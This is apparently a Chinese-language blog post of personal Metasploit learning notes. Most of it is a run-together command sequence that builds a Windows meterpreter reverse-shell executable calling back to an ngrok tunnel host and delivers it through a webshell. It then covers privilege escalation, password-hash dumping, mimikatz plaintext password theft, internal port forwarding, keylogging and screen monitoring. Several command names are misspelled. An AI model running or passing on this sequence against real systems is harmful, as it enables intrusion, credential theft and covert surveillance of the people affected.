Metasploit使用笔记

Admin 2020-01-27 223人围观 ,发现0个评论 Metasploit学习笔记

在学习Kali Linux渗透时候记录的Metasploit使用笔记

 Metasploit使用笔记 Web教程

0x00 简介

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。


0x01 reverse_tcp 反弹shell

sunny clientid 隧道id 
即可启动服务生成反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=19286 -f exe > /tmp/reverse.exeMsfconsole        #启动msfuse exploit/multi/handler    #监听set payload windows/meterpreter/reverse_tcp    #设置payload reverse_tcpset LHOST 0.0.0.0        #设置本地监听所有IPset LPORT 端口        #设置本地监听端口4444run即可然后上传reverse.exe至webshell运行revers.exe此时等待一会儿发现本机已经建立会话getuid  //发现权限较低,为usergetsystem    //提权migrate pid    //进程注入提权hashdump  //下载hashload mimikaz //读取明文pawdmeterpreter下: shell   //进入对方shellportfwd add -l 本机端口 -r 远程主机IP -p 远程主机端口   //内网转发rdesktop a 32 127.0.0.1:本机端口   //远程链接moudle    //模块payload   //攻击载荷msvenom   //msfpayload,msfencode的结合体msvenom -p 攻击载荷 -LHOST 本地IP -LPORT 本地端口 -f 文件格式 -o 输出目录use exploit/multi/handler  监听模块set payload 相同攻击载荷set lhost 0.0.0.0set lport 本地端口//建立会话后jobs 停止获取sessions -l   //列出sessionsession -i id   //进入meterpreter之后的对于具体操作 输入-help 或 ? 即可获取帮助比如键盘记录啊、屏幕监控run vnc等等的~

就到这里了,也可以使用background后,使用msf的getsystem提权


请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客